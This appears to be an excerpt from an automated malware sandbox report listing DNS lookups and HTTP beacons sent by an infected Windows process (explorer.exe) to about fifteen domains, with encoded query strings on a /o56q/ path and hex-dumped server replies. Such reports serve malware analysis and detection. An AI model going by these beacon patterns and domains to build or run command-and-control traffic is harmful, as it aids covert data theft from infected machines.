                                                                      Nov 20, 2020 20:14:04.097718954 CET53577628.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:14:04.102109909 CET53554358.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:14:09.270708084 CET5071353192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:14:09.323026896 CET53507138.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:14:10.497039080 CET5613253192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:14:10.524116993 CET53561328.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:14:14.509269953 CET5898753192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:14:14.790863037 CET53589878.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:14:15.527842045 CET5657953192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:14:15.564673901 CET53565798.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:14:37.294660091 CET6063353192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:14:37.637876034 CET53606338.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:14:40.966525078 CET6129253192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:14:41.431552887 CET53612928.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:14:46.445712090 CET6361953192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:14:46.580270052 CET6493853192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:14:46.607456923 CET53649388.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:14:46.788213968 CET53636198.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:14:48.465173006 CET6194653192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:14:48.516504049 CET53619468.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:14:51.807282925 CET6491053192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:14:51.938031912 CET53649108.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:14:57.175626993 CET5212353192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:14:57.373497009 CET53521238.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:15:02.698811054 CET5613053192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:15:02.756552935 CET53561308.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:15:07.898215055 CET5633853192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:15:07.962762117 CET53563388.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:15:12.983716011 CET5942053192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:15:13.024260044 CET53594208.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:15:18.165290117 CET5878453192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:15:18.610785007 CET53587848.8.8.8192.168.2.3

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                      Nov 20, 2020 20:13:47.504547119 CET192.168.2.38.8.8.80xaf73Standard query (0)www.ussouthernhome.comA (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:13:53.098772049 CET192.168.2.38.8.8.80x8532Standard query (0)www.myreviewandbonuses.comA (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:13:58.849778891 CET192.168.2.38.8.8.80x36ccStandard query (0)www.thrust-board.comA (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:14:04.062829018 CET192.168.2.38.8.8.80x60c4Standard query (0)www.teelinkz.comA (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:14:09.270708084 CET192.168.2.38.8.8.80x4f87Standard query (0)www.not-taboo.comA (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:14:14.509269953 CET192.168.2.38.8.8.80x3991Standard query (0)www.sz360buy.comA (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:14:37.294660091 CET192.168.2.38.8.8.80xc30dStandard query (0)www.sz360buy.comA (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:14:40.966525078 CET192.168.2.38.8.8.80x2ce0Standard query (0)www.houseofhawthorn.comA (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:14:46.445712090 CET192.168.2.38.8.8.80xda4aStandard query (0)www.bs600mc.comA (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:14:51.807282925 CET192.168.2.38.8.8.80x7017Standard query (0)www.tnicholson.designA (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:14:57.175626993 CET192.168.2.38.8.8.80x3a9Standard query (0)www.sabaicraft.comA (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:15:02.698811054 CET192.168.2.38.8.8.80xe942Standard query (0)www.deadroommn.comA (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:15:07.898215055 CET192.168.2.38.8.8.80x5604Standard query (0)www.biolineapparel.comA (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:15:12.983716011 CET192.168.2.38.8.8.80xb034Standard query (0)www.keitakora.comA (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:15:18.165290117 CET192.168.2.38.8.8.80x54Standard query (0)www.qzrpxx.comA (IP address)IN (0x0001)

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                      Nov 20, 2020 20:13:47.546031952 CET8.8.8.8192.168.2.30xaf73No error (0)www.ussouthernhome.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                                      Nov 20, 2020 20:13:47.546031952 CET8.8.8.8192.168.2.30xaf73No error (0)ext-sq.squarespace.com198.49.23.141A (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:13:47.546031952 CET8.8.8.8192.168.2.30xaf73No error (0)ext-sq.squarespace.com198.185.159.141A (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:13:53.304198980 CET8.8.8.8192.168.2.30x8532No error (0)www.myreviewandbonuses.commyreviewandbonuses.comCNAME (Canonical name)IN (0x0001)
                                                                      Nov 20, 2020 20:13:53.304198980 CET8.8.8.8192.168.2.30x8532No error (0)myreviewandbonuses.com66.235.200.112A (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:13:58.889568090 CET8.8.8.8192.168.2.30x36ccNo error (0)www.thrust-board.comthrust-board.comCNAME (Canonical name)IN (0x0001)
                                                                      Nov 20, 2020 20:13:58.889568090 CET8.8.8.8192.168.2.30x36ccNo error (0)thrust-board.com34.102.136.180A (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:14:04.102109909 CET8.8.8.8192.168.2.30x60c4No error (0)www.teelinkz.comteelinkz.comCNAME (Canonical name)IN (0x0001)
                                                                      Nov 20, 2020 20:14:04.102109909 CET8.8.8.8192.168.2.30x60c4No error (0)teelinkz.com34.102.136.180A (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:14:09.323026896 CET8.8.8.8192.168.2.30x4f87No error (0)www.not-taboo.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                      Nov 20, 2020 20:14:09.323026896 CET8.8.8.8192.168.2.30x4f87No error (0)shops.myshopify.com23.227.38.64A (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:14:14.790863037 CET8.8.8.8192.168.2.30x3991No error (0)www.sz360buy.com160.122.148.234A (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:14:37.637876034 CET8.8.8.8192.168.2.30xc30dNo error (0)www.sz360buy.com160.122.148.234A (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:14:41.431552887 CET8.8.8.8192.168.2.30x2ce0Server failure (2)www.houseofhawthorn.comnonenoneA (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:14:51.938031912 CET8.8.8.8192.168.2.30x7017No error (0)www.tnicholson.design65.254.250.119A (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:14:57.373497009 CET8.8.8.8192.168.2.30x3a9No error (0)www.sabaicraft.com192.64.147.164A (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:15:02.756552935 CET8.8.8.8192.168.2.30xe942No error (0)www.deadroommn.com35.186.238.101A (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:15:07.962762117 CET8.8.8.8192.168.2.30x5604Name error (3)www.biolineapparel.comnonenoneA (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:15:13.024260044 CET8.8.8.8192.168.2.30xb034No error (0)www.keitakora.comkeitakora.comCNAME (Canonical name)IN (0x0001)
                                                                      Nov 20, 2020 20:15:13.024260044 CET8.8.8.8192.168.2.30xb034No error (0)keitakora.com34.102.136.180A (IP address)IN (0x0001)
                                                                      Nov 20, 2020 20:15:18.610785007 CET8.8.8.8192.168.2.30x54No error (0)www.qzrpxx.comls3xg13085cb982.dlszywz.comCNAME (Canonical name)IN (0x0001)
                                                                      Nov 20, 2020 20:15:18.610785007 CET8.8.8.8192.168.2.30x54No error (0)ls3xg13085cb982.dlszywz.com47.91.170.148A (IP address)IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • www.ussouthernhome.com
                                                                      • www.myreviewandbonuses.com
                                                                      • www.thrust-board.com
                                                                      • www.teelinkz.com
                                                                      • www.not-taboo.com
                                                                      • www.tnicholson.design
                                                                      • www.sabaicraft.com
                                                                      • www.deadroommn.com
                                                                      • www.keitakora.com

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      0192.168.2.349726198.49.23.14180C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Nov 20, 2020 20:13:47.686299086 CET1055OUTGET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=ldw93ncdIRpnK2+SYFZ4XxcSdaL1EJRCuxI9ZUy/FVTDpSzjKcQcxAtGWqTUr4WUWqsB HTTP/1.1
                                                                      Host: www.ussouthernhome.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Nov 20, 2020 20:13:47.824301004 CET1057INHTTP/1.1 400 Bad Request
                                                                      content-length: 77564
                                                                      expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                      pragma: no-cache
                                                                      cache-control: no-cache, must-revalidate
                                                                      content-type: text/html; charset=UTF-8
                                                                      connection: close
                                                                      date: Fri, 20 Nov 2020 19:13:47 UTC
                                                                      x-contextid: FLYzyLwI/wpkpTukT
                                                                      server: Squarespace
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                      Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      1192.168.2.34972766.235.200.11280C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Nov 20, 2020 20:13:53.322623968 CET1138OUTGET /o56q/?6l=3sSzGDKqeoVzrX5Sn8ux2WAGTszDSWdOTpKicZCtYQqt6BLZU/lZy9O7FBLa6j9xXLzf&Rh=Y2MlpveH8ZUh0bF HTTP/1.1
                                                                      Host: www.myreviewandbonuses.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      2192.168.2.34972834.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Nov 20, 2020 20:13:58.907588005 CET1139OUTGET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=jRDzq8l+sUykxws9W99RfZyinw9UtZsC3+WzPyJGQo9muB/nYvZVAbl6dW3bW8Aotu+H HTTP/1.1
                                                                      Host: www.thrust-board.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Nov 20, 2020 20:13:59.024359941 CET1139INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Fri, 20 Nov 2020 19:13:58 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "5fb7c9ca-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      3192.168.2.34973034.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Nov 20, 2020 20:14:04.137047052 CET1144OUTGET /o56q/?6l=kNK7qyUr0rsKRGX6DQjm/XfEOCgL/rCBvSt6iCqDIwEC5hd1LlIznMkcIp/u79mXMRr7&Rh=Y2MlpveH8ZUh0bF HTTP/1.1
                                                                      Host: www.teelinkz.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Nov 20, 2020 20:14:04.252129078 CET1150INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Fri, 20 Nov 2020 19:14:04 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "5fb7c4ff-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      4192.168.2.34973123.227.38.6480C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Nov 20, 2020 20:14:09.341078043 CET1173OUTGET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=9Sq28+gy4k4CrtJhpK8mM8fwBZ3GLEhrr70589yX6MfPm6K+L9JTnWLRwUnCkAdg62kX HTTP/1.1
                                                                      Host: www.not-taboo.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Nov 20, 2020 20:14:09.492538929 CET1175INHTTP/1.1 403 Forbidden
                                                                      Date: Fri, 20 Nov 2020 19:14:09 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      X-Sorting-Hat-PodId: 166
                                                                      X-Sorting-Hat-ShopId: 47446032551
                                                                      X-Dc: gcp-us-central1
                                                                      X-Request-ID: 3810f865-43d3-46ae-836c-35de5bfd2af3
                                                                      X-Download-Options: noopen
                                                                      X-Permitted-Cross-Domain-Policies: none
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      CF-Cache-Status: DYNAMIC
                                                                      cf-request-id: 0688ad194300002bc2c6a9d000000001
                                                                      Server: cloudflare
                                                                      CF-RAY: 5f547e086c722bc2-FRA
                                                                      Data Raw: 61 66 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65
                                                                      Data Ascii: af4<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-ite


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      5192.168.2.34974265.254.250.11980C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Nov 20, 2020 20:14:52.037756920 CET4669OUTGET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=M16LsldnfrVP1zxs4qqy0X/sNN1zWVH6uxw1Og8LqWL4V8CpTN5QES3cWjsEPZlyN24a HTTP/1.1
                                                                      Host: www.tnicholson.design
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Nov 20, 2020 20:14:52.143873930 CET4670INHTTP/1.1 404 Not Found
                                                                      Date: Fri, 20 Nov 2020 19:14:52 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 867
                                                                      Connection: close
                                                                      Server: Apache/2
                                                                      Last-Modified: Fri, 10 Jan 2020 16:03:34 GMT
                                                                      Accept-Ranges: bytes
                                                                      Accept-Ranges: bytes
                                                                      Age: 0
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 